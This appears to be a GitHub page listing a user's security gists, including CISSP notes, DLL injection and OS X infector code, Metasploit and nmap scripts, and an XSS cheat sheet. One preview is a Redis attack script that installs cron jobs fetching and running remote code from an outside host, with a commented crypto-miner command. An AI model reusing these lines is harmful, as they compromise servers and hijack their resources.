Skip to content

Instantly share code, notes, and snippets.

View namishelex01's full-sized avatar
🎯
Focusing

Namish namishelex01

🎯
Focusing
27 followers · 179 following
View GitHub Profile
@duongkai
duongkai / lecture_note.md
Last active July 30, 2018 05:57
CISSP lectures note

Day 2

Chapter 2. Asset

Change management

  • Change Management

    • Create Change Request
    • Submit to CAB (Change advisory board)
    • Review the CR and impact
    • Create rollback plan

  • Hacking lifecycle

@RobinDavid
RobinDavid / dll_injection.py
Created February 25, 2014 17:49
Sample ddl injection (Gray Hat Python)
import sys
from ctypes import *
PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
kernel32 = windll.kernel32 #Get the wanted dll
pid = sys.argv[1] #Gather sent parameters
@carnal0wnage
carnal0wnage / msgrpc_ssh_version.py
Last active April 19, 2020 14:22
python script to connect to a metasploit msgrpc instance, setup and run an auxilary module.
#!/usr/bin/env python
import sys
import msfrpc
import time
if __name__ == '__main__':
# Create a new instance of the Msfrpc client with the default options
client = msfrpc.Msfrpc({})
# Login to the msf server using the password "abc123"
@jivoi
jivoi / how-to-oscp-final.md
Created April 10, 2017 12:45 — forked from unfo/how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@secretsquirrel
secretsquirrel / osx_infector.py
Last active March 31, 2021 19:33
From Shmoocon infection demo
import os
import struct
import shutil
import subprocess
class macho_intel32_shellcode():
"""
Mach-O Intel x32 shellcode class
"""
@chanj
chanj / AWS Security Resources
Last active June 21, 2021 09:49
AWS Security Resources
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
@lokielse
lokielse / redis-noauth-lady-hack.sh
Last active November 23, 2021 20:22
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/crontabs/root
# ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
@coffeegist
coffeegist / nmap-tcp-full.sh
Last active May 23, 2022 20:20
OSCP nmap scripts
if [ "$#" -ne 3 ]; then
echo "Usage: nmap-tcp-full.sh <TCP-QUICK-RESULTS.XML> <TARGET> <OUTPUT-FILENAME>"
exit 1
fi
nmap -nvv -Pn -sSV -T1 -p$(cat $1 | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA $3 $2
@carnal0wnage
carnal0wnage / DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Last active September 26, 2022 06:00
Links from Chris Gates/Ken Johnson DevOOPS RSA 17 presentation
@namishelex01
namishelex01 / xss-owasp-cheatsheet
Last active October 17, 2022 21:11 — forked from sseffa/xss-owasp-cheatsheet
xss-owasp-cheatsheet
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}